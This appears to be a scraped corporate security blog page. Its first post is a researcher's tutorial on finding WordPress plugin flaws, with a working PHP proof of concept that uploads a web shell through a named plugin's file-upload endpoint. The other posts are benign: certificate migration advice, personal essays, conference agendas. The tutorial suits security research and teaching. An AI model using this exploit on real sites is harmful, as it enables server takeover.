Skip navigation
All People > B-C-METOYX > William Brenner's Blog
1 2 3 4 Previous Next

William Brenner's Blog

49 posts

By Larry Cashdollar


I've received numerous questions about how I found so many Wordpress plugin vulnerabilities and how to write the exploits that were essential to the research.  I'll be honest, it's not hard if you have some experience in php programming and basic knowledge of secure programming.  To simplify things, we will narrow down certain traits of what plugins to examine.

Finding A Vulnerability

Looking at 38,000 plugins one file at a time would take much too long. Instead, I looked at files with specific names like upload.php, download.php or proxy.php.  The file names alluded to some operation of the plugin that is very sensitive and possibly done insecurely.  I also wanted the vulnerability to not require a valid Wordpress user. I thought vulnerabilities that didn't require user authentication would be the most fun.

Vulnerability Criteria

  1. Doesn't require authenticated Wordpress user
  2. MUST Processes user input via $_GET,$_POST,$_REQUEST
  3. Doesn't check if accessed directly
  4. Must have reachable code, not just defining a class

Developing an Exploit

I'll take a section of code that is vulnerable to remote file upload and step through it line by line as to what is required to successfully exploit it.  My comments are in blue.

Vulnerable Code

   27    if ( isset( $_POST['DATA_KEY'] ) ) {    Line 27: To reach the code we need DATA_KEY defined via POST   .   29      $dataKey = $_POST['DATA_KEY'];   30      $_SESSION[$dataKey]['file_uploaded'] = '';   .   32      if ( isset( $_POST['OP_TYPE'] ) ) {   Line 32: OP_TYPE also needs to be set to continue execution   34        $op_type = $_POST['OP_TYPE'];   35        $file_type = $op_type . '_file';   Line 35: OP_TYPE + _file will also need to be defined for $_FILES in line 37 below     37      if ( isset( $_FILES[$file_type] ) && !empty( $_FILES[$file_type] ) ) {   38     39          $file = $_FILES[$file_type];   40          $file_error = $file['error'];   41     42          if ( $file_error === UPLOAD_ERR_OK ) {   43     44            $tmp_name = $file['tmp_name'];   45     46            $file_type = false;   47            if( function_exists( 'finfo_fopen' ) ) {   48              $finfo = finfo_open( FILEINFO_MIME );   49                  $file_type = finfo_file( $finfo, $tmp_name );   50                  finfo_close( $finfo );   51            }   52            elseif( function_exists( 'mime_content_type' ) ) {   53              $file_type  = mime_content_type( $tmp_name );   Line 53: mime_content_type() determines mime-type based on file contents, so a basic web shell   is best   54            }   55      elseif ( !is_dir( $tmp_name ) && ( $fn = @fopen( $tmp_name , "rb" ) ) ) {   56              $bin = fread( $fn, $maxlen = 3072 );   57              fclose( $fn );   58            if ( strpos( $bin, "<?php" ) !== false )   Line 58: Sets the file_type variable to the mime type application/x-httpd-php based on the   presence of the string <?php, we can get around this by using short code which some servers   still allow    59              $file_type = "application/x-httpd-php";   60            }    65     66            if ( empty ( $file_type ) )   67              $file_type = $file['type'];   68     69            $csv_mimetypes = array(   70              'text/csv',   71              'text/plain',   72              'application/csv',   73              'text/comma-separated-values',   74              'application/excel',   75              'application/',   76              'application/vnd.msexcel',   77              'text/anytext',   78              'application/txt',   79            );  

   81    if( in_array( $file_type, $csv_mimetypes ) ) {   Line 81: If the mime type is not present in that array throw an error and exit      83    if ( isset( $_POST['UPLOAD_DIR'] ) ) {   Line 83: We will need to define our upload path, this can be hard to guess but is vital for   exploitation   85    $wpsc_upload_dir = $_POST['UPLOAD_DIR'];   86    $dst_name = $file['name'];   87    $dest_file = $wpsc_upload_dir . $dst_name;   88    $dest_file = str_replace( '\\', '/', $dest_file ); // fix path   89     90    if ( move_uploaded_file( $tmp_name, $dest_file ) ) {   91      $_SESSION[$dataKey]['file_uploaded'] = $dest_file;   92        echo "success";  

The required parameters and fields that we need defined are below. These are required when we make our POST request to get a proof of concept working. 

  1. We need a $_POST request with DATA_KEY defined.
  2. Need a $_POST request with OP_TYPE defined as part of our filename.
  3. Also need $_POST with UPLOAD_DIR pointing at a writable path in web root.
  4. our $_FILES variable needs to have $OP_TYPE_FILE defined and pointing at our payload.
  5. Our payload needs to exist locally from our adversarial system.


  1. <?php
  2. echo "Running PoC against target site<br>";
  3. $uploadfile="/var/www/s.php3";
  4. $ch =
  5. curl_init("http://wpsite/wp-content/plugins/csv2wpec-coupon/csv2wpecCoupon_FileUpload.php");
  6. curl_setopt($ch, CURLOPT_POST, true);
  7. curl_setopt($ch, CURLOPT_POSTFIELDS,
  8.       array('UPLOAD_DIR'=>'/usr/share/wordpress/wp-content/uploads/','OP_TYPE'=>'shell','DATA_KEY'=>1,'shell_file'=>"@$uploadfile",'folder'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'s.php3'));
  9. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  10. $postResult = curl_exec($ch);
  11. curl_close($ch);
  12. print "$postResult";
  13. ?>

Where s.php3* is a small web shell like:


Usage : http://wpsite/wp-content/uploads/shell.php3?c=id

* Credit

Screen Shot 2015-11-10 at 6.32.27 PM.png

Shell Access

Screen Shot 2015-11-10 at 6.34.58 PM.png


I'm still actively looking at the security of newly published Wordpress plugins and software in general, and I plan to continue documenting tips and tidbits I discover as I go.  If you're a Wordpress site maintainer or someone looking to find vulnerabilities, it's always a good idea to look at the code you are deploying. 

As we move toward 2016, browser developers have moved to retire the SHA-1 cryptographic hash algorithm in favor of SHA-2. Browsers are beginning to show warnings or errors for HTTPS connections made to servers presenting certificate chains signed using SHA-1.


Companies like Google, Mozilla, Microsoft and the CAB/Browser Forum have released their own descriptions of how they're managing the process. This post describes the Akamai-compatible workflow to help you manage the change process for your properties easily, regardless of the signatory Certificate Authority (CA) on your certificate.

Customers with certificates provisioned on the Secure Content Delivery Network (SCDN) have the flexibility to select when and how to replace their current SHA-1 based certificate with a SHA-2 based certificate.


Akamai's new Certificate Provisioning System (CPS), designed to enable customer self service, is now in Beta. CPS streamlines and automates a significant portion of the certificate provisioning process and provides consistency and error checks tightly linked to your certificate order.


What do do

If your Certificate/signature is managed by Akamai (CPS only):

Contact your account team and ask to have your certificate reissued with a SHA-2 hash. Your account team will coordinate reissuing your certificate with a SHA-2 hash from your CA.  This will not incur a charge from Akamai, and should not disrupt service for your end-users.

If your Certificate  signature is managed through the third party CA process (CPS or older):

It is important that you do not request a new certificate from your CA without first requesting a CSR from Akamai. CPS requires a new CSR, generated by Akamai (with an Akamai-generated key pair), for each certificate. The consistency checks will prevent uploading and enrolling a new certificate against an existing CSR and key pair.

Ask your account team to generate a new CSR for you to send to your chosen CA. This will not incur a charge from Akamai, nor should your CA object to reissuing the certificate with the new CSR. 

If you encounter difficulties using the Certificate  signature update workflows:

If the above workflows are not possible for your current configuration, please reach out to your account team or Customer Care for additional support.


When should you switch from SHA-1 to SHA-2?

The decision to switch from SHA-1 to SHA-2 depends on how you use the Secure CDN. For most Akamai customers, whose end-users access Akamai-hosted web sites using standard web browsers, you should plan to switch the next time your certificate gets renewed. (Akamai-managed certificates renew annually, CPS or your account team can show you detail for each of your certificates.) For security-sensitive customers, you may wish to initiate a switch sooner; this can also be done through CPS or with your account team's assistance.

Some customers have end users who are dependent on the older SHA-1 algorithm: perhaps they are slow to upgrade their browsers, or perhaps they use a custom Web client that has not yet been upgraded for SHA-2. These customers might value compatibility over security; only the customer can make that choice.

Given the industry drive to remove support for SHA-1, we recommend that these customers immediately begin upgrading their browsers or custom clients - but Akamai will continue to support SHA-1 certificates on our network into 2016.

In pretty much every industry of late, people of great talent, drive and achievement are being labeled rock stars. I certainly see it as I work in the information security industry.

Those who get the label tend to deserve it. But there’s a dangerous side-effect: The term rock star can bloat the egos of those it’s bestowed upon. It leads to big heads and bad attitudes. I’ve watched many handle it with humble grace. And I’ve watched a few fall into the trap.

Exhibit A: me.

As a security journalist who posted new content almost daily, I got a lot of praise and, yes, some called me a rock star. This snowballed when I started The OCD Diaries.

I found myself on more than one “security influencers to follow” list. People kept praising me for my supposed raw honesty. So I did what any good addict does: I drank it up, tied all my self worth into it and started to believe it all.

Don’t get me wrong. I think I’ve accomplished a lot of good stuff, and I’ve certainly been lucky in my career. But a rock star? Looking back on it now, I don’t think so.

I believed it when people told me, though. My head grew larger, while my brain went stale. I stopped trying. I truly believed I could pull off anything with little effort.

Of course, the real world doesn’t work that way.

I eventually found myself growing snobby, moldy and stagnant. Somewhere along the way as I bought into my own hype, I started to fail.

I lapsed into old habits. I began dialing in my work. The praise became chains, weighing me down like Scrooge’s old business partner in A Christmas Carol.

Sometime last fall, I went from being a rock star to the office jerk. It left me off balance and in a depression that deepened over the winter. I started to worry about being found out as an impostor. Worse, I found myself losing my usefulness.

Since then, I’ve been working hard to return to my roots. I feel like I’m starting to make real progress, but I still have a ways to go.

As for those in my industry who remain honest and humble, I aspire to be more like them. And I don’t fault those who are kind enough to put the rock star mantle on others. I simply see as lessons for all of us:

Never stop working your tails off.
Never stop seeking truth.
Don’t be like me — not too much, anyway.

On Skipping Security Cons

Posted by B-C-METOYX Employee Oct 13, 2015

On Twitter recently, friend and fellow infosec professional Marcus Carey suggested industry peers place too much importance on conferences. He said:

There is no way these people that speak & appear at every conference should be taken as serious practitioners of their craft.

One can take the tweet several ways.

Some might say he’s criticizing conference organizers for roping in people who spend all their time speaking at and attending conferences and too little time in their organizations working on the daily challenges the bad guys throw in front of us.

Others might say he’s picking on people who attend a lot of conferences simply to be seen. I don’t think he is, especially since every time I’ve seen him in person, it’s been at a security conference. The conferences I attend have a lot of repeat speakers who I’ll never get tired of listening to, such as security pioneer Dan Geer. (Watch him speak at Black Hat 2014.) Other famous speakers have done a lot of important work over time but have become less relevant lately. I won’t name names here, but yeah, I’m tired of seeing them as keynoters.

The debate over security conferences will go on into infinity. Carey’s soul searching sparked something within me, though, and it’s unlikely it has much to do with his intent.

I love security conferences. I love traveling around the world to attend them. I’ve made countless connections that have taught me many lessons in how this industry ticks. It wouldn’t be a stretch to say my conference attendance led to my current job.

But I have to admit that as the years have gone on, I’ve become almost obsessive about getting to conferences. To skip them is to be invisible and irrelevant. To stay away is to no longer be respected.
That’s how my mind presents it, anyway.

In an earlier post I called it the security rock star mentality — the notion that you had to be seen to be relevant and that by getting around a lot, I thought I was somehow better than I really was.
Early on, as a journalist, I had to attend as many conferences as possible to generate content and feed the needs of a daily news machine. In my current role, the mission is more about promoting what my company does and collecting research I can bring back to base for future use.

My current job also involves less frequent travel. Some of that is because I can easily communicate face-to-face with colleagues around the world through Skype and other video-conferencing programs.
But I’m also traveling less because there’s a lot going on in my family right now. My kids have a lot of activities I want to be there for. My father has been in hospice and I’m trying to get in all the time with him as I can. And so it goes.

I’ve noticed something since grounding myself, however: My absence at security conferences hasn’t hurt my career or workmanship. Not one bit.

The people I like to see at conferences are all available to me on Twitter, Facebook, and increasingly on Skype. Most talks are recorded and end up on YouTube within hours of being delivered. And most importantly, less travel has meant more time immersed in my company’s research. I’m working with some of the best researchers in the industry, learning more from them than I’d learn from a hundred conference keynotes.

I’m not retreating from the conference scene forever. I still get too much value from events like DEF CON, Black Hat, RSA, ShmooCon and BSides to completely stay away. I expect to travel more frequently next year.

In the meantime, I’m staying home, being around more for my family and constantly working to improve my craft.

While I was away on vacation last week, some of my good friends in the InfoSec community did this panel at BSidesLV 2015. They discussed the importance of doing over talking, and captured the problem of trash talking in the community more eloquently than I have up to this point. The problems they touched upon are some of the things I found in myself when I wrote this post about the “InfoSec Rock Star” complex.

Please watch the whole thing.

This is about an information security practitioner getting schooled by a 14-year-old about something as basic as an iPhone PIN number.

Since I work in information security, family expects me to be THE expert. And sometimes I ask for trouble when I try to teach people a lesson — like grabbing phones and writing on the owners’ Facebook walls to demonstrate the value of having a security PIN on the phone.

One day my oldest son decided to give me a taste of my own medicine.

He had been watching me punch in my PIN for some time, and when the opportunity arose, he grabbed my phone, correctly entered the PIN and wrote on my Facebook wall.

“You should be ashamed of yourself,” my son said. “You’re Mr. Security in the family, but you let yourself get hacked by someone who can’t even drive a car.”

Fair enough.

The lesson: No matter how much experience you have in security, you’re still an easy target if you get lazy. In my case, I was lazy about regularly changing my PIN.

I don’t think he’ll guess what it is now. But I’ll change it again soon, just to be safe.

A quick scheduling note ahead of Akamai Edge 2015: I'll be moderating a panel with fellow Akamai security researchers about the various trends we've been tracking in the last 12 months. If you're at Edge, please join us.


Security Threat Landscape - A Year in review

Description: The more you know about the security threat landscape and the mindset of malicious attackers, the stronger your cloud security strategy defense can be. In this session, members of Akamai's threat intelligence team will show how they use their expertise in security research and threat intelligence to stay one step ahead of cyber attackers. Learn about the threat landscape for 2015, emerging attack trends, techniques, toolkits and botnet activity.Session Date/Time: Wednesday Oct 21, 2:40-3:20 p.m.


The talk is part of a robust security track scheduled for this year.

Today is the 14th anniversary of the Sept. 11, 2001 terrorist attacks. To mark the occasion, I'd like to share this post from 2013, in which Akamai CEO Tom Leighton and CSO Andy Ellis share memories of co-founder Danny Lewin -- including his tragic death aboard American Airlines Flight 11 that tragic day. They shed more light into Akamai's actions that day, which kept the Internet running in the face of crushing demand for information.

The interviews coincided with the release of a book about Danny called "No Better Time: The Brief, Remarkable Life of Danny Lewin, The Genius Who Transformed The Internet."


Tom remembers his company rushing into action and doing what it was built to do, even as colleagues reeled from news that Danny had been killed. It's widely believed he was the first casualty that day, stabbed during a likely attempt to stop the hijackers before they crashed the plane into the north tower of the WTC.


"Phone lines were down, I couldn't reach anyone at Akamai, and one method of communication was the Web," Tom said. "People flocked to various websites and were ground to a halt."

Meantime, he added, hackers were taking advantage of the situation and attacking government websites -- a source of critical information during the attacks. Akamai conducted more than a dozen emergency integrations that day, including that of several government sites and CNN, among others.

By Tom's estimation, Akamai has about 3,600 employees today, many added this year. On Sept. 11, 2001, however, there were 800-1,000 employees and the company was in the midst of layoffs after the dot-com bust. Employees had to put their anxieties over the company's future aside and keep the Internet from going down. They succeeded.

"That day was a thesis example of what Akamai is about," Tom said.

Andy Ellis was originally scheduled to travel on Flight 11 that day, but his travel arrangements were rescheduled, putting him on a Sept. 12 flight. With all flights banned in the hours following the attacks, the rescheduled trip never happened.

Andy worked closely with Danny, and remembers his relentless drive and passion.

"Danny was a really obstreperous person who didn't easily take no for an answer," he said. "He wanted to see the evidence for everything. You had to convince him that something wasn't possible before he'd believe it. He was a great guy who had this tremendous energy."

On Sept. 11, after absorbing the shock of what was happening, Andy went to work. He walked right into the situation room designated for incidents. "Up until that day, our peak traffic had been somewhere around 6 gigabits per second that we had served for all of our customers," he said. "We had one customer -- MSNBC -- reach 12.5 gigabits per second that day. They were live-streaming their cable channel -- it was a tiny 3-inch by 2-inch video stream, but it was something you could get anywhere in the world."

As traffic doubled for that one customer, the rest of the customer base averaged about 8 gigabits per second that day -- still above normal.

"We were integrating organizations left and right," he said. "As soon as the FBI released pictures of the assailants, their site came under such a flood of traffic -- much of it believed to be malicious -- so they Akamaized. We picked up customer after customer as people decided they were going to do denial-of-service attacks in conjunction with the kinetic attacks."

Today, such online attacks happen around the clock and are now one of Akamai's chief business drivers, Tom Leighton said.

"Cyber extortion is big business, and there are those who launch attacks out of political motivation," he said. "As a result, security is a much bigger part of our message and business."

That business will continue tomorrow as it does every day. But in the midst of it, the company will take time to remember Danny Lewin's life and legacy with a ceremony outside Akamai headquarters, fittingly in the park that bears his name.

Thumbnail image for a288a63a1bb755ad72a1805ee82a0b4e.JPG

An excerpt from my latest Dark Reading Post:

I'm all for raising awareness, but making designer vulnerabilities, catchy logos and content part of the disclosure process is a step in the wrong direction.

If I’ve learned anything about vulnerability management as part of a large security operation, it’s that these things are serious business. Vulnerabilities are a threat to companies using the affected technology and – more importantly – a threat to their customers. Customers’ personal data is at stake. Trust in the affected company is on the line. We need to figure out where our systems are affected, if at all, and move fast but carefully to keep users secure.

That means investigating disclosures in a calm, cool manner. But in this age of so-called “designer vulnerabilities” – in which catchy logos and other content are used as part of the disclosure process – it’s getting more difficult to maintain one’s perspective.

Read the rest here.

SOURCE Boston will be held later this month at the Marriott Courtyard. Several people from Akamai InfoSec will be there volunteering, working the Akamai booth and attending talks. The full agenda is below.


A full daily break-down of talks with specific time slots will be published shortly. Meantime, here's a list of confirmed speakers and keynotes.



Jim Routh, CISO Aetna

Mike Murray, Director, Cyber Security Assessment and Consulting at GE Healthcare

David Kennedy, Founder of Trusted Sec and Binary Defense Systems


A Swift Teardown

Jared Carlson


"This talk centers on understanding Swift, Apple's new language for iOS and OS X development. In this talk I will discuss how Swift works, what's different from Objective-C, and the benefits and drawbacks of using it. We'll dive into the details, such as ""What's protocol witness table? how the swift runtime works, how does Swift work with LLVM, as well as how to approach reverse engineering Swift apps.


All That Cybers Is Not War

Brendan O'Connor/Leviathan Security Group, Dr. John Linwood Griffin/TripAdvisor

Frightened by people saying "the Geneva Conventions don't apply" to the Internet? Confused by vendors and Feds saying that APT is an act of war and the proper response is a missile? Take a deep breath and sit down for a talk both hilarious and somber on the law of war. You'll learn how to experiment with war crimes in your spare time and how to use illegal hot-air-balloon-mounted guns as we travel from Geneva to The Hague to Tallinn on a whirlwind tour of wars, weapons, and wanton destruction!


iROP - Interesting ROP gadgets

Xiaoning Li


Today ROP based exploits are still very popular. Security solutions including EMET/KBouncer have designed different policies such as call-preceded ret location to detect/block ROP gadgets, at the same time control flow integrity becomes the popular proposal to solve ROP problem. But researcher finally found valid gadgets are still enough to create ROP chains. In this talk, we will discuss existing ROP defense approaches and evaluate new proposal like CFI/Shadow Stack with more powerful interesting gadgets.


Bugged Files: Is Your Document Telling on You?

Daniel Crowley, Damon Smith

iSEC Partners

Certain file formats, like Microsoft Word and PDF, are known to have features that allow for outbound requests to be made when the file opens. Other file formats allow for similar interactions but are not well-known for allowing such functionality. In this talk, we explore various file formats and their ability to make outbound requests, as well as what that means from a security and privacy perspective. Most interestingly, these techniques are not built on mistakes, but intentional design decisions, meaning that they will not be fixed as bugs. From data loss prevention to de-anonymization to request forgery to NTLM credential capture, this presentation will explore what it means to have files that communicate to various endpoints when opened.


Using NLP to detect phishing and APT CnC domains

Jeremiah O'Connor


Spoofed branded domain names have been equally used in mass phishing campaigns and as CnC domains in recent APT attacks. In this talk we present NLPRank, a generic detection model we developed to identify targeted attacks' CnC domains and also commodity phishing attacks. The system uses heuristics such as: Natural Language Processing (NLP), domain to ASN mapping, and HTML tag analysis. Through careful analysis, we have created a malicious language derived from the lexical features of FQDNs of specific APT data sets. This model runs on our live streaming authoritative DNS traffic and is part of our real-time alert system.


This system has been having great success in detecting compromised and dedicated phishing sites as well as cyber-espionage CnC domains. In this presentation, we will be sharing various use cases and results showcasing the accuracy and coverage of this model.


Embedded Insecurity: Can We Fix The Internet of Evil Things?

Paul Asadoorian

Security Weekly

While many have proven the threat of embedded systems, or IoT as "they" say, the question remains, can we fix it? Dive in and discover what are the things, why all of the things are vulnerable, how are the things vulnerable, and what can we do to fix the problem? Attackers are using things to profit, manufacturers keep producing insecure things, running insecure software, when will it end? Explore this topic, including a few technical demonstrations and conclude with top ten lists for different audiences to educate the masses on this topic.

Getting the most from your managed security providers

Wade Woolwine

Josh Feinblum


How can you effectively leverage a third party provider in your incident response program? In this talk the speakers will provide an inside look at how incident response programs can succeed, drawing from years of experience and real-world scenarios to share what works when you're evaluating a vendor - as well as what doesn't, and the steps you can take to ensure an effective third-party partnership, including how to classify assets, users and data and the importance of practicing response scenarios.

Protecting your cloud server with a cloud IDS

Josh Pyorre


Most cloud providers don't provide any kind of intrusion detection or other advanced security solutions. Often, you might find out about a compromise of your website or other publicly-accessible service through other sources, such as social media. I'm proposing a simple way of building an IDS that you can send traffic through to provide some degree of protection from attackers.

Rebuilding the Credibility of a Security Team

Paul Davis


Many CISOs/CSO and Directors of Security Operations are facing the challenge of increased expectations, misplaced assumptions of responsibility and limited resources to deliver success. This leads to increased frustration within the security teams who are striving to protect their organizations. The rest of the organization often feels that the security team is either not delivering the results or regard IT security as an unwanted, interfering overhead. Paul has been brought in multiple times to rebuild IT security organizations, and turn them into respected and valued teams that deliver results and are relied upon.


This presentation will show how Paul has been able to change the delivery model of the IT security teams, improving morale and efficiency, while simultaneously regaining the respect of other teams within the organizations including audit, IT service delivery, and the business leaders. He has delivered success within Fortune 5 companies, within critical infrastructure organizations and for multiple IT security delivery organizations.

Defending the Enterprise with Evernote

Salvador Grec

Most people are already familiar with Evernote. It's easy to just throw all our miscellaneous data into the Elephant and effortlessly find it later with a quick search or correlate similar ideas with tags. Evernote is literally our external brain that increases our intelligence and helps us become more productive overall. This presentation discusses an experiment of using Evernote as a defensive management platform, the specific concepts and strategies used, and its overall effectiveness. Specific topics covered will include the advantages of using an open and flexible platform that can be molded into an open/closed source threat intelligence database, an information sharing platform, and an incident case management system. Although using Evernote in this way in large enterprises is probably not possible, the same lessons learned can be applied to implement a similarly effective system using internally-hosted open source or commercial software.


Selling for Security Professionals

Stephanie Losi

How can security professionals talk to business executives in their language? Business managers may focus on ROI, decision modeling and growth, while security professionals are thinking worst-case scenarios, redundancy and diversity of controls, and risk reduction. Do you see the problem here? Our Venn diagram appears to be fairly non-overlapping, though with some intersection around protecting reputation. But in reality, our Venn diagram is more like this: hugely overlapping circles geared toward maximizing the business' reputation, making the business resilient to inevitable errors and incidents, and helping the business lines grow.


This talk will focus on how security professionals can sell what they bring to the table and communicate better with business lines, shifting from two different perspectives to a meeting of the minds.


Penetration Testing in the Cloud

Dan Lambright


This talk discusses challenges associated with ensuring your infrastructure is secure in the cloud. Cloud providers are very careful with letting customers run penetration tests because they can be misunderstood for real attacks, but such tests are needed to confirm data is safe. This talk discusses the conditions and limits of permissions obtainable, and explores methods of doing targeted tests in ways that will not affect others using multi-tenant hardware. A promising approach is to have a docker instance play the role of the hacker, and use an instance's internal network interface to carry out attacks.


Adversary Profile: Gothic Panda

Silas Cutler


CrowdStrike has been actively tracking an advanced adversary group known as Gothic Panda. Known for high-profile targeting of government research groups, financial institutions, and companies in the development sector, the adversary's activity has been hallmarked by the reuse of the malware Pirpi, which has evolved since 2009. It is speculated they are using compromised servers for hosting control infrastructure as an operational security measure. It is believed that this adversary originates from the

People's Republic of China and likely will resurface in 2015. This presentation will provide an analysis of hallmarks of the malware Pirpi, as well as explore the origins of this adversary.


Improving the State of Healthcare Information Security as a Security Investigator

Roy Wattanasin


The time has begun. You have already heard about these warnings from the news and from your security intelligence infrastructure.


The FBI had warned that hackers are or will be targeting your healthcare organization. 2014 was a rough year for data security in the healthcare industry. About 43 percent of breaches came from healthcare per the Ponemon Institute. 2015 has been a trickier and rougher year with one of the largest healthcare breaches reported to date. This talk highlights and walks you through the top four healthcare breaches.


It plans to dive in to the role as a security investigator (using public information), review how/why the breach happened, when it was discovered, how many people were impacted, whom had discovered it and what the organization(s) did to assist and help with the breach. Additionally, the open talk hopes to provide recommendations on how to help prevent the breaches and get comments and feedback from the audience. All references and sources will be provided from the research that has been done. "Time is inevitable, but knowledge and pro-activeness is on your side. "


Multipath TCP - Breaking Today's Networks with Tomorrow's Protocols

Catherine Pearce


MultiPath TCP (MPTCP) is an extension to TCP that enables sessions to use multiple network endpoints and multiple network paths at the same time, and to change addresses in the middle of a connection. MPTCP works transparently over most existing network infrastructure, yet very few security and network management tools can correctly interpret MPTCP streams. With MPTCP network security is changed: how do you secure traffic when you can't see it all and when the endpoint addresses change in the middle of a connection?


This session shows you how MPTCP breaks assumptions about how TCP works, and how it can be used to evade security controls. We will also show tools and strategies for understanding and mitigating the risk of MPTCP-capable devices on a network.


Quantifying cyber attacks - to optimize and assess your defense

Jason Syversen

Siege Technologies

This talk will describe the challenges of quantifying offensive and defensive capabilities and posture. This is not an IT-oriented metrics-talk about measuring the firewall rules or number of incidents last year. Instead, you'll hear about new military-backed research on how to quantify the effectiveness of attacks, predict outcomes and measure defensive strength will be discussed, as well as the future of data-driven security technologies.

Growing Up: A Maturity Model and Roadmap for Vulnerability Management

Eric Cowperthwaite

Core Security

There are differences between each of the high-profile hacks you've seen in recent headlines, but there are also a few consistent characteristics of the modern breach. Inevitably, we discover known software vulnerabilities were left unpatched, networks were exposed and critical assets were open to attack. This pattern is repeating itself because - across industries and sectors - threat and vulnerability management (TVM) programs are operating far below their potential, and most leaders don't know how to take their programs to "the next level."


That's why Eric and the team at Core Security created the five-level Threat and Vulnerability Management Maturity Model. It uses a traditional Carnegie Mellon Maturity Model to illustrate the continuum of capability that an organization can implement. This is a significant departure from the current approach to vulnerability management, which essentially calls for implementing a vulnerability assessment product, establishing a few basic measurements to prioritize patch management and few, if any, means of measuring the efficacy of the program. In fact, today's typical TVM program will be somewhere around level one or two in this Maturity Model.


During this session Eric will outline the five levels, and attendees will be able to easily identify where their respective organizations stand on the Maturity Model. He will also review the specific steps necessary to advance through each level, ensuring attendees leave with clear action items for maturing their TVM programs.


Monitoring Social Media in 5 Minutes a Week

Dakota Nelson

Independent Researcher

Physical reconnaissance is constantly getting easier - now, your employees are on the attacker's side! Using social media, attackers can access a trove of information about their target's security measures. Learn about these threats and how to counter them by keeping an eye on social media yourself. Includes a new open source tool, pushpin-web, that can give you valuable, actionable social media insight in 5 minutes a week.


Reactive JS Security Testing & Exploitation

Matt Wood


JavaScript applications continue to become more and more complex. With real-time collaboration in mind and entire applications becoming supported by a "single UI page," a new buzzword for these applications has arisen over the last few years, Reactive Applications/JavaScript. Stated simply, this is the separation of the HTML/CSS UI from the real-time event-driven data back end. There are many compelling reasons for these advances/changes, unfortunately many of the same application design mistakes are being made that the industry saw when AJAX heavy applications first entered the majority (the over exposure of the data API). While some frameworks allow for secure deployment, it is not easy or intuitive in all cases. Many researchers and framework developers have put a lot of effort into the security design of these "reactive" frameworks, but application developers are not utilizing these features effectively, or worse, do not know it is necessary. This presentation will offensively review some of the new technologies employed, how to identify these event-driven back ends, review several OWASP attack classes in the context of "Reactive" frameworks (MeteorJS/RxJS/Microsoft Data API/Angular) and finally how to address data-security within these "Reactive" frameworks. Attendees will witness poorly secured reactive frameworks dumping sensitive information, effective injection techniques against various reactive endpoints and finally what a security professional needs to know and look for to identify and secure "Reactive" endpoints across several frameworks.

"MQTT, CoAP, and Building Secure Things"

Jack Mannino


In this presentation we will explore two of the most commonly used IoT protocols, MQTT and CoAP. We will explore how they work, protocols they're designed to work with, and common architectures. Attacks against the protocols and specific implementations will be demonstrated that can be used to impersonate other devices, knock systems offline, and potentially execute remote code. We will demonstrate how to mitigate these issues within your own code as well as library and framework issues to watch out for.


iOS App Analytics VS Privacy: An analysis of the use of analytics

Guillaume Ross


As developers attempt to tailor their applications to customers, obtain more information about how they are used and how reliable they are, the use of app analytics services on mobile devices is now very common. During this talk, we will look at the usage patterns of analytics services by the most popular apps in various categories, such as games and productivity applications, as well as different application business models (free, freemium, paid, etc.). What does it all mean for your privacy? Can you prevent it? What types of apps are the greatest offenders? How can you detect it? These are questions we will answer, as we look at the patterns, the analytics providers used, and explore the type of data that is sent as well as the privacy policies of these analytics service providers.

Who Watches the Watchers? Metrics for Security Strategy

Michael Roytman

Security Metrics are often about the performance of information security professionals - tranditional ones are centered around vulnerability close rates, timelines, or criticality ratings. But how does one measure if those metrics are the rights ones? How does one measure risk reduction, or how sucecssful your metrics program is at operationalizing that which is necessary to prevent a breach.   

As RSA Conference 2015 attendees continue to finalize evening schedules, here's a suggestion: Come by our event with AT&T. Meet and mingle with Akamai, AT&T and your fellow security professionals. Enjoy libations and hors d'oeuvres.

The Burritt Room,
Mystic Hotel

Date & Time:
Wednesday, April 22
7:30-10:30 p.m.

Register today to attend this invitation-only reception at Burritt Room in the historic Mystic Hotel just North of Union Square in San Francisco.

Hope to see you there!


Agenda for #BSidesSF 2015

Posted by B-C-METOYX Employee Apr 9, 2015

A lot of attention is on RSA Conference 2015, which commences a week from Monday. But let's not forget that BSidesSF is also that week. Below is a full agenda for the event, which is April 19 and 20 at the OpenDNS offices at 135 Bluxome St., San Francisco.



Sunday, April 19





















Monday, April 20



















It's two weeks until RSA, the biggest security conference of the year. For first-timers, this is the time to start preparing and understanding what lies ahead. It can be an overwhelming experience, with two loud exhibit halls, too many evening events to count on two hands, and so many talks it can be hard to choose what's best for your interests.

To that end, here's some advice for RSA 2015, which takes place April 20-24 at the Moscone Center in San Francisco:

1. The vendor keynotes are not what they used to be
No disrespect intended toward the vendor keynoters, but their talks have become less noteworthy in recent years.

Sure, it's good to hear their take on the latest industry trends, but if you're an IT practitioner with years of experience you already know what they're going to tell you. The mob has moved its criminal operations online? You knew that. A data breach awaits the company who fails to take security seriously? You knew that, too. You also already knew that a data breach can happen if you DO take security seriously.

The problem with RSA keynotes is that the size of the stage and auditorium and the rapid succession of keynotes doesn't allow for the give and take between speaker and attendees that would make these more valuable. But sometimes you have to take what you can get.

2. Don't let the exhibit floors get to you
The people working the booths will hound you aggressively to stay a few minutes and see their slide deck or hear the pitch. That's OK. They're doing their job. But if you're not careful you could easily get sucked into things that aren't going to help you. And you'll miss other booths that may have something more important to your particular security challenges.

Look over the floor plan before you go in and pinpoint the vendor booths you actually need to get to. Walk right past everything else.

3. Spend quality time at BSidesSF
One of the best things about RSA is that a ton of neighboring events take place in the neighborhood around the Moscone Center to coincide with the main attraction. One event that's of particular interest to me is Security B-Sides, and the full agenda is here. This event takes place April 19 and 20 at the OpenDNS offices at 135 Bluxome St., San Francisco.

4. It's more about the networking
The most important part of RSA is the networking. The last two were great because I got to finally meet a bunch of people I had only met up to that point through Twitter. I also made many new contacts who have offered me a variety of helpful feedback ever since. If there's an opportunity to have coffee with a fellow security practitioner at the same time a keynote is going on, go for the coffee.

The keynotes may entertain, but it's the relationships you forge over coffee or a meal that will likely lead to useful collaborations and lines of support in the years to come.

Good morning, folks! Here's a look at content from the past week.


Please note that in addition to the Akamai Blog, all this content and more can be found on Akamai Community, and the security section of,


***I urge you all to start using Akamai Community if you haven't already. Customers are actively using it to ask us questions. This week, they asked a lot of questions about CVE-2015 0204, and they've been pretty happy with our responsiveness. We've also created a section on Community for Security Research and Intelligence. Dave Fernandez and I are still fleshing it out, but it'll launch soon.


Akamai Addresses CVE 2015-0204 Vulnerability

The following, written by Rich Salz, deals with Akamai's response to CVE 2015-0204. The vulnerability has been exploited by such exploits as the so-called FREAK attack.



Global Map of DDoS Attacks

